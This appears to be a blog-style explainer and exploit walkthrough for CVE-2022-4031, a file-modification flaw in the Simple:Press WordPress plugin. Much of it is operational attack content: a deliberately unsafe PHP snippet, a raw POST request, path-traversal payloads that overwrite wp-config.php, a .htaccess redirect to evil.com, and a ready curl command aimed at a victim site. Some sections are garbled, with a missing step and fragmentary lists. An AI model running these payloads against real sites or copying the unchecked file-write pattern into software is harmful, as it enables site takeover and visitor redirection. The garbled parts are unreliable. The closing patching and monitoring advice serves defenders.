CVE-2022-4031 - Arbitrary File Modification in Simple:Press WordPress Plugin (Up to v6.8) — Explained & Exploited

WordPress is everywhere, and so are plugins that extend its functionality. But with great power comes… well, sometimes glaring vulnerabilities. CVE-2022-4031 hits close to home for thousands of site owners who use the Simple:Press forums plugin. Today, let’s break down what this bug is, how it works, and how it can be exploited.

What Is CVE-2022-4031?

The Simple:Press plugin up to version 6.8 doesn’t properly restrict which files administrators (and any user with high-level permissions) can access and modify through the plugin’s own file editing features. The problem is all about the file parameter—this controls *which* file is being edited, but the system fails to enforce limits so effectively it allows for arbitrary file modifications. In other words, a savvy admin (or a bad actor with an admin account) can edit any file on the server that the web process can access.

> This is an "arbitrary file modification" vulnerability, and while it requires high privileges, it blows a huge hole in server security if admin accounts are ever compromised.

Breaking Down the Vulnerability

Vulnerable Versions:  
Simple:Press plugin v6.8 and below

Vulnerable Functionality:  
The endpoint/plugin page that exposes file editing, allowing admins to pass a file path as a parameter without proper sanitization.

Impact:  
A compromised administrator can modify any file that the web server can write to, including critical WordPress core files, plugin code, .htaccess, or other configuration files.

How It Works (Technical Details)

Every plugin has some way for admins to manage settings or content. Simple:Press lets you edit files for some reason (possibly forum templates or config files). It uses a URL parameter—often called file—which is supposed to let you pick which *forum*-related file to edit, but without checks, it’s game over.

Here's a simplified example of what the vulnerable code looked like

// This is NOT actual code from Simple:Press, but approximates the issue
if ( isset($_POST['file']) && isset($_POST['content']) ) {
    $file_to_edit = $_POST['file'];
    $new_content = $_POST['content'];
    file_put_contents($file_to_edit, $new_content); // DANGER!!!
}

> *The plugin trusts user input for the file path—danger!*

There’s no check to make sure $file_to_edit stays in a safe directory. That means an attacker can POST something like /var/www/html/wp-config.php or ../../../../some/other/file, and the plugin overwrites it with whatever content the attacker provides.

1. Get Logged In

Log in as an admin or hijack a session of a privileged user.

2. Find the File Editor Form

Navigate to the admin dashboard, open the Simple:Press plugin’s file editor (usually something like: wp-admin/admin.php?page=simplepress-file-editor).

3. Intercept the Request

Use your browser developer tools or a proxy (like Burp Suite) to watch the POST request when you save a file.

You might see something like this

POST /wp-admin/admin.php?page=simplepress-file-editor HTTP/1.1
Host: victim-site.com
Cookie: wordpress_logged_in_xxx=xxx;
Content-Type: application/x-www-form-urlencoded

file=themes/default/header.php&content=Blah%20blah%20stuff

Change the file parameter to a sensitive file. For example

file=../../../../wp-config.php&content=<?php echo "pwned"; ?>

Or even

file=/var/www/html/.htaccess&content=Redirect 301 / http://evil.com

5. Send the Request

Hit "Send". If the server PHP process can write to the file, it’ll replace whatever was there with your arbitrary content.

Example in cURL

curl -b "wordpress_logged_in_xxx=xxx" \
     -d "file=../../../../wp-config.php&content=<?php+phpinfo();+?>" \
     -X POST "https://victim-site.com/wp-admin/admin.php?page=simplepress-file-editor";

Break security controls

- Re-direct visitors to phishing/malware

Since writing outside web root is possible, the attacker could also backdoor the server in less obvious ways.

Who’s Vulnerable?

- Any WordPress site running Simple:Press v6.8 or below where high-privileged accounts might be compromised, or where multiple admins aren’t all trusted.

Update: Always upgrade Simple:Press to the latest version.

- Monitor: Check for unexpected file changes, especially in wp-config.php, .htaccess, or plugin directories.

References & Further Reading

- Official Simple:Press Plugin Page
- WPScan Vulnerability Database: CVE-2022-4031
- NVD (National Vulnerability Database) Entry

Conclusion

CVE-2022-4031 is a great reminder: just because a plugin option is for “admins only” doesn’t mean you can skip secure coding practices. One compromised admin and your whole WordPress install—and possibly your server—could be owned, all because of a missing folder check.

Always sanitize file paths and never trust user input, no matter who the user claims to be!

If you’re running Simple:Press, patch up fast or remove unused admin tools—your site’s life may depend on it.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 18:34:00 UTC